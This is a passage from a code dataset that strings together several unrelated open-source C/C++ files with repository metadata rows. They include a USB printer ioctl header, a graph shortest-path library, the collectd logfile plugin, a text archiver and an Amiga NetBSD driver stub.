opaque(opaque_), vbid(vbid_), rollbackSeqno(rollbackSeqno_),
cons(conn) { }
std::string getDescription() {
return std::string("Running rollback task for vbucket %d", vbid);
}
bool run();
private:
EventuallyPersistentEngine *engine;
uint32_t opaque;
uint16_t vbid;
uint64_t rollbackSeqno;
dcp_consumer_t cons;
};
#endif // SRC_DCP_CONSUMER_H_
| 32.795082 | 86 | 0.672582 |
ce5bb1a9626fc1e224c8f092a26c99001fc8d01f | 1,037 | h | C | msys64/mingw64/x86_64-w64-mingw32/include/usbprint.h | Bhuvanesh1208/ruby2.6.1 | 17642e3f37233f6d0e0523af68d7600a91ece1c7 | [
"Ruby"
] | 12,718 | 2018-05-25T02:00:44.000Z | 2022-03-31T23:03:51.000Z | msys64/mingw64/x86_64-w64-mingw32/include/usbprint.h | Bhuvanesh1208/ruby2.6.1 | 17642e3f37233f6d0e0523af68d7600a91ece1c7 | [
"Ruby"
] | 8,483 | 2018-05-23T16:22:39.000Z | 2022-03-31T22:18:16.000Z | msys64/mingw64/x86_64-w64-mingw32/include/usbprint.h | Bhuvanesh1208/ruby2.6.1 | 17642e3f37233f6d0e0523af68d7600a91ece1c7 | [
"Ruby"
] | 1,400 | 2018-05-24T22:35:25.000Z | 2022-03-31T21:32:48.000Z | /*
* usbprint.h
*
* This file is part of the mingw-w64 runtime package.
* No warranty is given; refer to the file DISCLAIMER within this package.
*/
#include <winapifamily.h>
#if WINAPI_FAMILY_PARTITION (WINAPI_PARTITION_DESKTOP)
#define USBPRINT_IOCTL_INDEX 0x0000
#define IOCTL_USBPRINT_GET_LPT_STATUS CTL_CODE (FILE_DEVICE_UNKNOWN, USBPRINT_IOCTL_INDEX+12, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_USBPRINT_GET_1284_ID CTL_CODE (FILE_DEVICE_UNKNOWN, USBPRINT_IOCTL_INDEX+13, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_USBPRINT_VENDOR_SET_COMMAND CTL_CODE (FILE_DEVICE_UNKNOWN, USBPRINT_IOCTL_INDEX+14, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_USBPRINT_VENDOR_GET_COMMAND CTL_CODE (FILE_DEVICE_UNKNOWN, USBPRINT_IOCTL_INDEX+15, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_USBPRINT_SOFT_RESET CTL_CODE (FILE_DEVICE_UNKNOWN, USBPRINT_IOCTL_INDEX+16, METHOD_BUFFERED, FILE_ANY_ACCESS)
DEFINE_GUID (GUID_DEVINTERFACE_USBPRINT, 0x28d78fad, 0x5a12, 0x11d1, 0xae, 0x5b, 0x0, 0x0, 0xf8, 0x3, 0xa8, 0xc2);
#endif
| 51.85 | 131 | 0.841851 |
33f5e667b9d06a35865160ad8626caa8b52dff2f | 761 | h | C | arm/shell/menuItem.h | mborik/speccy2010-dividised | 414978cdaf3e27852d47e9f3d5211503b17c6a2f | [
"MIT"
] | 26 | 2018-09-20T08:49:37.000Z | 2022-02-22T14:50:40.000Z | arm/shell/menuItem.h | mborik/speccy2010-dividised | 414978cdaf3e27852d47e9f3d5211503b17c6a2f | [
"MIT"
] | 4 | 2019-04-18T11:04:08.000Z | 2020-09-05T21:12:36.000Z | arm/shell/menuItem.h | mborik/speccy2010-dividised | 414978cdaf3e27852d47e9f3d5211503b17c6a2f | [
"MIT"
] | 6 | 2018-10-19T21:10:03.000Z | 2021-04-30T22:42:08.000Z | #ifndef SHELL_MENUITEM_H_INCLUDED
#define SHELL_MENUITEM_H_INCLUDED
#include "../settings.h"
#include "../utils/cstring.h"
class CMenuItem {
private:
int x, y, state, size, x2, origY, maxLen;
const char *origName;
byte colors[4];
CString data;
const CParameter *param;
void Init(int _x, int _y, const char *_name, const CParameter *_param);
void Redraw(bool justInit = false);
public:
CMenuItem(int _x, int _y, const char *_name, const CParameter *_param);
CMenuItem(int _x, int _y, const char *_name, const char *_data);
void UpdateData(bool force = false);
void UpdateData(const char *_data);
void UpdateState(int _state);
inline const char *GetName() { return origName; }
inline const CParameter *GetParam() { return param; }
};
#endif
| 23.78125 | 72 | 0.726675 |
359c56e0316f2b7837c9a51f96cd800ed2b82d5b | 10,000 | h | C | seqan/graph_algorithms/single_source_shortest_path.h | annawoodard/pizzly | 9f8d5f3d39a0735d4b24e24b766a6f17ce35d6ff | [
"BSD-2-Clause"
] | 84 | 2017-03-20T23:30:19.000Z | 2022-01-06T18:19:15.000Z | external/seqan/include/seqan/graph_algorithms/single_source_shortest_path.h | variar/contest-template | bad78a60fd32b3b66035cb064838663c39b38bc2 | [
"MIT"
] | 40 | 2017-03-22T11:43:39.000Z | 2022-02-11T10:45:48.000Z | external/seqan/include/seqan/graph_algorithms/single_source_shortest_path.h | variar/contest-template | bad78a60fd32b3b66035cb064838663c39b38bc2 | [
"MIT"
] | 10 | 2017-04-01T09:00:09.000Z | 2020-04-24T15:06:22.000Z | // ==========================================================================
// SeqAn - The Library for Sequence Analysis
// ==========================================================================
// Copyright (c) 2006-2016, Knut Reinert, FU Berlin
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
// * Neither the name of Knut Reinert or the FU Berlin nor the names of
// its contributors may be used to endorse or promote products derived
// from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL KNUT REINERT OR THE FU BERLIN BE LIABLE
// FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
// DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
// CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
// LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
// OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
// DAMAGE.
//
// ==========================================================================
// Author: Tobias Raussch <rausch@embl.de>
// ==========================================================================
// Implementation of Single-Source-Shortest-Path algorithm.
// ==========================================================================
#ifndef INCLUDE_SEQAN_GRAPH_ALGORITHMS_SINGLE_SOURCE_SHORTEST_PATH_H_
#define INCLUDE_SEQAN_GRAPH_ALGORITHMS_SINGLE_SOURCE_SHORTEST_PATH_H_
namespace seqan {
// ============================================================================
// Forwards
// ============================================================================
// ============================================================================
// Tags, Classes, Enums
// ============================================================================
// ============================================================================
// Metafunctions
// ============================================================================
// ============================================================================
// Functions
// ============================================================================
// ----------------------------------------------------------------------------
// Function singleSourceShortestPath()
// ----------------------------------------------------------------------------
template <typename TSpec, typename TPredecessorMap, typename TVertexDescriptor, typename TNameMap>
inline void
_printPath(Graph<TSpec> const& g,
TPredecessorMap const& predecessor,
TVertexDescriptor const source,
TVertexDescriptor const v,
TNameMap const& nameMap)
{
if (source == v) {
std::cout << getProperty(nameMap, source);
} else if (getProperty(predecessor, v) == getNil<typename VertexDescriptor<Graph<TSpec> >::Type>()) {
std::cout << "No path from " << getProperty(nameMap, source) << " to " << getProperty(nameMap, v) << " exists.";
} else {
_printPath(g,predecessor, source, getProperty(predecessor, v), nameMap);
std::cout << "," << getProperty(nameMap, v);
}
}
template <typename TSpec, typename TPredecessorMap, typename TVertexDescriptor1, typename TVertexDescriptor2>
inline void
_printPath(Graph<TSpec> const& g,
TPredecessorMap const& predecessor,
TVertexDescriptor1 const source,
TVertexDescriptor2 const v)
{
if (source == v) {
std::cout << source;
} else if (getProperty(predecessor, v) == getNil<typename VertexDescriptor<Graph<TSpec> >::Type>()) {
std::cout << "No path from " << source << " to " << v << " exists.";
} else {
_printPath(g,predecessor, source, getProperty(predecessor, v));
std::cout << "," << v;
}
}
template <typename TSpec, typename TPredecessorMap, typename TVertexDescriptor1, typename TVertexDescriptor2, typename TEdgeSet>
inline bool
_collectEdges(Graph<TSpec> const& g,
TPredecessorMap const& predecessor,
TVertexDescriptor1 const source,
TVertexDescriptor2 const v,
TEdgeSet& edgeSet)
{
if ((TVertexDescriptor1) source == (TVertexDescriptor1) v) {
return true;
} else if (getProperty(predecessor, v) == getNil<typename VertexDescriptor<Graph<TSpec> >::Type>()) {
return false;
} else {
edgeSet.insert(findEdge(g, getProperty(predecessor, v), v));
return _collectEdges(g,predecessor, source, getProperty(predecessor, v), edgeSet);
}
}
//////////////////////////////////////////////////////////////////////////////
template <typename TSpec, typename TPredecessorMap, typename TVertexDescriptor, typename TEdgeSet>
inline bool
_collectEdges(Graph<TSpec> const& g,
TPredecessorMap const& predecessor,
TVertexDescriptor const source,
TEdgeSet& edgeSet)
{
typedef Iterator<Graph<Undirected<> >, VertexIterator>::Type TVertexIterator;
TVertexIterator it(g);
for(;!atEnd(it); goNext(it)) {
if (!_collectEdges(g, predecessor, source, value(it), edgeSet)) {
edgeSet.clear();
return false;
}
}
return true;
}
template <typename TSpec, typename TVertexDescriptor, typename TWeightMap, typename TPredecessorMap, typename TDistanceMap>
inline void
_initializeSingleSource(TPredecessorMap & predecessor,
TDistanceMap & distance,
Graph<TSpec> const & g,
TVertexDescriptor const source,
TWeightMap const & weight)
{
typedef Graph<TSpec> TGraph;
typedef typename Iterator<TGraph, VertexIterator>::Type TVertexIterator;
typedef typename Value<TPredecessorMap>::Type TPredVal;
typedef typename Value<TWeightMap>::Type TDistVal;
TPredVal nilPred = getNil<typename VertexDescriptor<TGraph>::Type>();
TDistVal infDist = _getInfinityDistance(weight);
TVertexIterator it(g);
for(;!atEnd(it);goNext(it)) {
assignProperty(distance, getValue(it), infDist);
assignProperty(predecessor, getValue(it), nilPred);
}
assignProperty(distance, source, 0);
}
template <typename TSpec, typename TWeightMap, typename TPredecessorMap, typename TDistanceMap, typename TVertexDescriptor, typename TEdgeDescriptor>
inline void
_relax(Graph<TSpec> const& g,
TWeightMap const& weight,
TPredecessorMap& predecessor,
TDistanceMap& distance,
TVertexDescriptor const u,
TEdgeDescriptor const e)
{
TVertexDescriptor v = targetVertex(g,e);
if (getProperty(distance, v) > getProperty(distance,u) + getProperty(weight,e)) {
assignProperty(distance, v, getProperty(distance,u) + getProperty(weight,e));
assignProperty(predecessor, v, u);
}
}
// TODO(holtgrew): This looks broken (distance too high below).
/*!
* @fn dagShortestPath
* @headerfile <seqan/graph_algorithms.h>
* @brief Computes shortest paths from a single source in a directed acyclic graph (DAG).
*
* @signature void dagShortestPath(predecessor, distance, g, source, weight);
*
* @param[out] predecessor A property map. A property map that represents predecessor relationships among vertices.
* It determines a shortest-paths tree.
* @param[out] distance A property map. Indicates for each vertex th distance from the source.
* do exist.
* @param[in] g A directed acyclic graph. Types: Directed Graph
* @param[in] source A source vertex. Types: VertexDescriptor
* @param[in] weight A weight map. In a directed acyclic graph edge weights can be negative because no cycles
*
* @section Example
*
* @include demos/dox/graph_algorithms/dag_shortest_path.cpp
*
* @include demos/dox/graph_algorithms/dag_shortest_path.cpp.stdout
*
* @see bellmanFordAlgorithm
* @see dijkstra
*/
template <typename TSpec, typename TVertexDescriptor, typename TWeightMap, typename TPredecessorMap, typename TDistanceMap>
void dagShortestPath(TPredecessorMap & predecessor,
TDistanceMap & distance,
Graph<TSpec> const & g,
TVertexDescriptor const source,
TWeightMap const & weight)
{
typedef typename Iterator<Graph<TSpec>, OutEdgeIterator>::Type TOutEdgeIterator;
typedef typename Iterator<String<TVertexDescriptor>, Rooted>::Type TStringIterator;
// Initialization
resizeVertexMap(predecessor, g);
resizeVertexMap(distance, g);
// Topological sort
String<TVertexDescriptor> order;
topologicalSort(order, g);
_initializeSingleSource(predecessor, distance, g, source, weight);
//DAG Shortest Paths
TStringIterator it = begin(order);
while(!atEnd(it)) {
TOutEdgeIterator itout(g, getValue(it));
for(;!atEnd(itout);++itout) {
_relax(g,weight,predecessor, distance, getValue(it), getValue(itout));
}
goNext(it);
}
}
} // namespace seqan
#endif // #ifndef INCLUDE_SEQAN_GRAPH_ALGORITHMS_SINGLE_SOURCE_SHORTEST_PATH_H_
| 42.735043 | 149 | 0.6038 |
77509948726453b958a9dda382216bc0bf4ea50b | 8,969 | c | C | src/textar.c | LHLaurini/textar | 13cb2d14998370e30bdf852f393271c1ad349cf7 | [
"MIT"
] | null | null | null | src/textar.c | LHLaurini/textar | 13cb2d14998370e30bdf852f393271c1ad349cf7 | [
"MIT"
] | 2 | 2019-12-19T00:13:22.000Z | 2019-12-19T00:28:29.000Z | src/textar.c | LHLaurini/textar | 13cb2d14998370e30bdf852f393271c1ad349cf7 | [
"MIT"
] | null | null | null | #include "textar.h"
#include "textar-internals.h"
#include "entry.h"
#include "list.h"
#include "path.h"
#include <errno.h>
#include <limits.h>
#include <string.h>
bool textArCreateArchive(AppendArchiveFn append_archive,
EntryIteratorFn entry_iterator,
int options, VerboseFn verbose,
void* userPtr)
{
textArClearError();
const TextArEntry* entry = NULL;
while (entry = entry_iterator(entry, userPtr))
{
if (entry == (TextArEntry*)-1)
{
textArSetError("failed to iterate through entries");
return false;
}
const char* path = fixPath(entry->path);
verbose(entry->path);
append_archive(">>> \"", userPtr);
append_archive(path, userPtr);
if (entry->type == TEXTARENTRYTYPE_DIRECTORY && path[strlen(path) - 1] != '/')
{
append_archive("/\"", userPtr);
}
else
{
append_archive("\"", userPtr);
}
if (entry->type == TEXTARENTRYTYPE_SYMLINK)
{
append_archive(" =>", userPtr);
}
if (options & TEXTAROPTIONS_MODE)
{
append_archive(" mode=", userPtr);
append_archive(modeToString(entry->mode), userPtr);
}
if (options & TEXTAROPTIONS_OWNID)
{
append_archive(" ownerid=", userPtr);
append_archive(ownerIdToString(entry->ownerId, entry->groupId), userPtr);
}
if (options & TEXTAROPTIONS_OWNNAME)
{
append_archive(" ownername=", userPtr);
append_archive(entry->owner, userPtr);
append_archive(":", userPtr);
append_archive(entry->group, userPtr);
}
if (entry->type == TEXTARENTRYTYPE_FILE ||
entry->type == TEXTARENTRYTYPE_SYMLINK)
{
append_archive("\n\n", userPtr);
append_archive(entry->data, userPtr);
}
append_archive("\n\n", userPtr);
}
return true;
}
static bool closeEntryHelper(TextArEntry* theOpenEntry, IOFn close_entry,
size_t numEmptyLines, void* userPtr)
{
size_t linesToErase = numEmptyLines + 1;
if (linesToErase > 2)
{
linesToErase = 2;
}
theOpenEntry->data = (char*)&linesToErase;
if (!close_entry(theOpenEntry, userPtr))
{
textArSetError("failed to close entry");
return false;
}
return true;
}
bool textArExtractArchive(IOFn open_entry, IOFn append_entry, IOFn close_entry,
ReadArchiveLineFn read_archive_line,
int options, VerboseFn verbose, void* userPtr)
{
textArClearError();
char* line;
TextArEntry theOpenEntry;
bool entryIsOpen = false;
bool isFirstLineOfEntry = false;
size_t numEmptyLines = 0;
char originalNameEnd;
char* nameEnd = NULL;
while (line = read_archive_line(userPtr))
{
if (line[0] == '>' && line[1] == '>' && line[2] == '>')
{
if (line[3] == '>') // Is an escaped entry (not an actual entry)
{
if (entryIsOpen)
{
theOpenEntry.data = line + 1;
if (!append_entry(&theOpenEntry, userPtr))
{
textArSetError("failed to extract entry");
goto error;
}
}
else
{
// This is ok. See below.
}
}
else
{
if (entryIsOpen)
{
entryIsOpen = false;
if (!closeEntryHelper(&theOpenEntry, close_entry, numEmptyLines, userPtr))
{
goto error;
}
}
theOpenEntry.type = TEXTARENTRYTYPE_FILE;
theOpenEntry.group = NULL;
theOpenEntry.owner = NULL;
theOpenEntry.groupId = -1;
theOpenEntry.ownerId = -1;
theOpenEntry.mode = -1;
theOpenEntry.userPtr = NULL;
char* current = skipWhitespace(&line[3]);
char* name = current;
if (name[0] == '"')
{
name++;
if ((nameEnd = findLastOf(name, '"')))
{
originalNameEnd = *nameEnd;
*nameEnd = 0;
current = nameEnd + 1;
}
else
{
name--;
if (!(nameEnd = findWhitespace(current)))
{
nameEnd = findEnd(current);
}
originalNameEnd = *nameEnd;
*nameEnd = 0;
current = nameEnd + 1;
}
}
else
{
name = current;
if (!(nameEnd = findWhitespace(current)))
{
nameEnd = findEnd(current);
}
originalNameEnd = *nameEnd;
*nameEnd = 0;
current = nameEnd + 1;
}
if (nameEnd[-1] == '/')
{
theOpenEntry.type = TEXTARENTRYTYPE_DIRECTORY;
}
theOpenEntry.path = name;
verbose(theOpenEntry.path);
if (originalNameEnd != 0 && originalNameEnd != '\n')
{
while (true)
{
current = skipWhitespace(current);
if (*current == 0 || *current == '\n')
{
break;
}
else if (current[0] == '=' && current[1] == '>')
{
if (theOpenEntry.type == TEXTARENTRYTYPE_FILE)
{
char* next = findWhitespace(current);
if (next)
{
current = next;
}
else
{
current = findEnd(current);
}
theOpenEntry.type = TEXTARENTRYTYPE_SYMLINK;
continue;
}
else
{
errno = EINVAL;
textArSetError("conflicting entry type");
goto error;
}
}
char* propEnd = findFirstOf(current, '=');
char* valueEnd = findWhitespace(current);
if (!valueEnd)
{
valueEnd = findEnd(current);
}
if (!propEnd || propEnd > valueEnd)
{
errno = EINVAL;
textArSetError("invalid entry syntax");
goto error;
}
size_t propLen = propEnd - current;
const char* value = propEnd + 1;
size_t valueLen = valueEnd - propEnd - 1;
if (propLen == 7 && strncmp(current, "ownerid", propLen) == 0)
{
if (options & TEXTAROPTIONS_OWNID)
{
if (!stringToOwnerId(value, valueLen, &theOpenEntry.groupId,
&theOpenEntry.ownerId))
{
errno = EINVAL;
textArSetError("invalid owner id");
goto error;
}
}
}
else if (propLen == 9 && strncmp(current, "ownername", propLen) == 0)
{
if (options & TEXTAROPTIONS_OWNNAME)
{
static char groupName[33];
static char userName[33];
const char* userStr;
if (!stringToOwner(value, valueLen, &userStr))
{
errno = EINVAL;
textArSetError("invalid owner name");
goto error;
}
size_t groupLen = userStr - value - 1;
size_t userLen = valueLen - (userStr - value);
memcpy(groupName, value, groupLen);
groupName[groupLen] = 0;
memcpy(userName, userStr, userLen);
userName[userLen] = 0;
theOpenEntry.group = groupName;
theOpenEntry.owner = userName;
}
}
else if (propLen == 4 && strncmp(current, "mode", propLen) == 0)
{
if (options & TEXTAROPTIONS_MODE)
{
if (!stringToMode(value, valueLen, &theOpenEntry.mode))
{
errno = EINVAL;
textArSetError("invalid mode");
goto error;
}
}
}
else
{
errno = EINVAL;
textArSetError("unknown attribute");
goto error;
}
current = valueEnd;
}
}
if (!open_entry(&theOpenEntry, userPtr))
{
textArSetError("failed to open entry");
goto error;
}
entryIsOpen = true;
isFirstLineOfEntry = true;
numEmptyLines = 0;
*nameEnd = originalNameEnd;
nameEnd = NULL;
}
}
else
{
if (entryIsOpen)
{
if (!(isFirstLineOfEntry && line[0] == '\n'))
{
theOpenEntry.data = line;
if (!append_entry(&theOpenEntry, userPtr))
{
textArSetError("failed to extract entry");
goto error;
}
if (line[0] == '\n')
{
if (numEmptyLines < 2)
{
numEmptyLines++;
}
}
else
{
numEmptyLines = 0;
}
}
isFirstLineOfEntry = false;
}
else
{
// Archives are allowed to have text before any entry. Do
// nothing (or maybe display it?)
}
}
}
if (errno)
{
textArSetError("failed to read archive");
goto error;
}
if (entryIsOpen)
{
entryIsOpen = false;
if (!closeEntryHelper(&theOpenEntry, close_entry, numEmptyLines, userPtr))
{
goto error;
}
}
return true;
error:
if (nameEnd)
{
*nameEnd = originalNameEnd;
}
int errnoBkp = errno;
if (entryIsOpen)
{
// Nothing we can do if it fails
closeEntryHelper(&theOpenEntry, close_entry, numEmptyLines, userPtr);
entryIsOpen = false;
}
errno = errnoBkp;
return false;
}
const char* textArErrorDesc()
{
return textArSetError(NULL);
}
const char* textArErrorFile()
{
return textArSetErrorFile(NULL);
}
const char* textArSetError(const char* err)
{
static const char* error = NULL;
if (err)
{
if (!error)
{
error = err;
}
else if (!err[0])
{
error = NULL;
}
}
return error;
}
void textArClearError()
{
textArSetError("");
}
const char* textArSetErrorFile(const char* err)
{
static char file[PATH_MAX] = "";
if (err)
{
// Just truncate if larger than PATH_MAX
strncpy(file, err, PATH_MAX - 1);
}
return (file[0] != 0) ? file : NULL;
}
| 20.109865 | 80 | 0.577099 |
ded7732b00ce22fcc648cbb8ae2207c53f26db94 | 5,680 | c | C | src/logfile.c | TranscendComputing/TopStackMessageAgent | 97da381e932b5ad0257dbcb108ad32caa049f599 | [
"Apache-2.0"
] | null | null | null | src/logfile.c | TranscendComputing/TopStackMessageAgent | 97da381e932b5ad0257dbcb108ad32caa049f599 | [
"Apache-2.0"
] | null | null | null | src/logfile.c | TranscendComputing/TopStackMessageAgent | 97da381e932b5ad0257dbcb108ad32caa049f599 | [
"Apache-2.0"
] | null | null | null | /**
* collectd - src/logfile.c
* Copyright (C) 2007 Sebastian Harl
* Copyright (C) 2007,2008 Florian Forster
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; only version 2 of the License is applicable.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
* Authors:
* Sebastian Harl <sh at tokkee.org>
* Florian Forster <octo at verplant.org>
**/
#include "collectd.h"
#include "common.h"
#include "plugin.h"
#include <pthread.h>
#define DEFAULT_LOGFILE LOCALSTATEDIR"/log/collectd.log"
#if COLLECT_DEBUG
static int log_level = LOG_DEBUG;
#else
static int log_level = LOG_INFO;
#endif /* COLLECT_DEBUG */
static pthread_mutex_t file_lock = PTHREAD_MUTEX_INITIALIZER;
static char *log_file = NULL;
static int print_timestamp = 1;
static int print_severity = 0;
static const char *config_keys[] =
{
"LogLevel",
"File",
"Timestamp",
"PrintSeverity"
};
static int config_keys_num = STATIC_ARRAY_SIZE (config_keys);
static int logfile_config (const char *key, const char *value)
{
if (0 == strcasecmp (key, "LogLevel")) {
log_level = parse_log_severity(value);
if (log_level == -1) return 1; /* to keep previous behaviour */
}
else if (0 == strcasecmp (key, "File")) {
sfree (log_file);
log_file = strdup (value);
}
else if (0 == strcasecmp (key, "Timestamp")) {
if (IS_FALSE (value))
print_timestamp = 0;
else
print_timestamp = 1;
} else if (0 == strcasecmp(key, "PrintSeverity")) {
if (IS_FALSE (value))
print_severity = 0;
else
print_severity = 1;
}
else {
return -1;
}
return 0;
} /* int logfile_config (const char *, const char *) */
static void logfile_print (const char *msg, int severity,
cdtime_t timestamp_time)
{
FILE *fh;
int do_close = 0;
struct tm timestamp_tm;
char timestamp_str[64];
char level_str[16] = "";
if (print_severity)
{
switch (severity)
{
case LOG_ERR:
snprintf(level_str, sizeof (level_str), "[error] ");
break;
case LOG_WARNING:
snprintf(level_str, sizeof (level_str), "[warning] ");
break;
case LOG_NOTICE:
snprintf(level_str, sizeof (level_str), "[notice] ");
break;
case LOG_INFO:
snprintf(level_str, sizeof (level_str), "[info] ");
break;
case LOG_DEBUG:
snprintf(level_str, sizeof (level_str), "[debug] ");
break;
default:
break;
}
}
if (print_timestamp)
{
time_t tt = CDTIME_T_TO_TIME_T (timestamp_time);
localtime_r (&tt, ×tamp_tm);
strftime (timestamp_str, sizeof (timestamp_str), "%Y-%m-%d %H:%M:%S",
×tamp_tm);
timestamp_str[sizeof (timestamp_str) - 1] = '\0';
}
pthread_mutex_lock (&file_lock);
if (log_file == NULL)
{
fh = fopen (DEFAULT_LOGFILE, "a");
do_close = 1;
}
else if (strcasecmp (log_file, "stderr") == 0)
fh = stderr;
else if (strcasecmp (log_file, "stdout") == 0)
fh = stdout;
else
{
fh = fopen (log_file, "a");
do_close = 1;
}
if (fh == NULL)
{
char errbuf[1024];
fprintf (stderr, "logfile plugin: fopen (%s) failed: %s\n",
(log_file == NULL) ? DEFAULT_LOGFILE : log_file,
sstrerror (errno, errbuf, sizeof (errbuf)));
}
else
{
if (print_timestamp)
fprintf (fh, "[%s] %s%s\n", timestamp_str, level_str, msg);
else
fprintf (fh, "%s%s\n", level_str, msg);
if (do_close != 0)
fclose (fh);
}
pthread_mutex_unlock (&file_lock);
return;
} /* void logfile_print */
static void logfile_log (int severity, const char *msg,
user_data_t __attribute__((unused)) *user_data)
{
if (severity > log_level)
return;
logfile_print (msg, severity, cdtime ());
} /* void logfile_log (int, const char *) */
static int logfile_notification (const notification_t *n,
user_data_t __attribute__((unused)) *user_data)
{
char buf[1024] = "";
char *buf_ptr = buf;
int buf_len = sizeof (buf);
int status;
status = ssnprintf (buf_ptr, buf_len, "Notification: severity = %s",
(n->severity == NOTIF_FAILURE) ? "FAILURE"
: ((n->severity == NOTIF_WARNING) ? "WARNING"
: ((n->severity == NOTIF_OKAY) ? "OKAY" : "UNKNOWN")));
if (status > 0)
{
buf_ptr += status;
buf_len -= status;
}
#define APPEND(bufptr, buflen, key, value) \
if ((buflen > 0) && (strlen (value) > 0)) { \
int status = ssnprintf (bufptr, buflen, ", %s = %s", key, value); \
if (status > 0) { \
bufptr += status; \
buflen -= status; \
} \
}
APPEND (buf_ptr, buf_len, "host", n->host);
APPEND (buf_ptr, buf_len, "plugin", n->plugin);
APPEND (buf_ptr, buf_len, "plugin_instance", n->plugin_instance);
APPEND (buf_ptr, buf_len, "type", n->type);
APPEND (buf_ptr, buf_len, "type_instance", n->type_instance);
APPEND (buf_ptr, buf_len, "message", n->message);
buf[sizeof (buf) - 1] = '\0';
logfile_print (buf, LOG_INFO,
(n->time != 0) ? n->time : cdtime ());
return (0);
} /* int logfile_notification */
void module_register (void)
{
plugin_register_config ("logfile", logfile_config,
config_keys, config_keys_num);
plugin_register_log ("logfile", logfile_log, /* user_data = */ NULL);
plugin_register_notification ("logfile", logfile_notification,
/* user_data = */ NULL);
} /* void module_register (void) */
/* vim: set sw=4 ts=4 tw=78 noexpandtab : */
| 25.357143 | 74 | 0.667077 |
e6169ed0d2a20d621871ebcb7bba842cd01664a0 | 4,211 | c | C | netbsd/sys/arch/amiga/dev/ioblix_zbus.c | MarginC/kame | 2ef74fe29e4cca9b4a87a1d5041191a9e2e8be30 | [
"BSD-3-Clause"
] | 91 | 2015-01-05T15:18:31.000Z | 2022-03-11T16:43:28.000Z | netbsd/sys/arch/amiga/dev/ioblix_zbus.c | MarginC/kame | 2ef74fe29e4cca9b4a87a1d5041191a9e2e8be30 | [
"BSD-3-Clause"
] | 1 | 2016-02-25T15:57:55.000Z | 2016-02-25T16:01:02.000Z | netbsd/sys/arch/amiga/dev/ioblix_zbus.c | MarginC/kame | 2ef74fe29e4cca9b4a87a1d5041191a9e2e8be30 | [
"BSD-3-Clause"
] | 21 | 2015-02-07T08:23:07.000Z | 2021-12-14T06:01:49.000Z | /*-
* Copyright (c) 2000 The NetBSD Foundation, Inc.
* All rights reserved.
*
* This code is derived from software contributed to The NetBSD Foundation
* by Ignatios Souvatzis.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by the NetBSD
* Foundation, Inc. and its contributors.
* 4. Neither the name of The NetBSD Foundation nor the names of its
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE NETBSD FOUNDATION, INC. AND CONTRIBUTORS
* ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
* TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR CONTRIBUTORS
* BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
/* IOBlix Zorro driver */
/* XXX to be done: we need to probe the com clock speed! */
#include <sys/types.h>
#include <sys/conf.h>
#include <sys/device.h>
#include <sys/systm.h>
#include <sys/param.h>
#include <machine/bus.h>
#include <machine/conf.h>
#include <amiga/include/cpu.h>
#include <amiga/amiga/device.h>
#include <amiga/amiga/drcustom.h>
#include <amiga/dev/supio.h>
#include <amiga/dev/zbusvar.h>
struct iobz_softc {
struct device sc_dev;
struct bus_space_tag sc_bst;
};
int iobzmatch __P((struct device *, struct cfdata *, void *));
void iobzattach __P((struct device *, struct device *, void *));
int iobzprint __P((void *auxp, const char *));
struct cfattach iobl_zbus_ca = {
sizeof(struct iobz_softc), iobzmatch, iobzattach
};
int
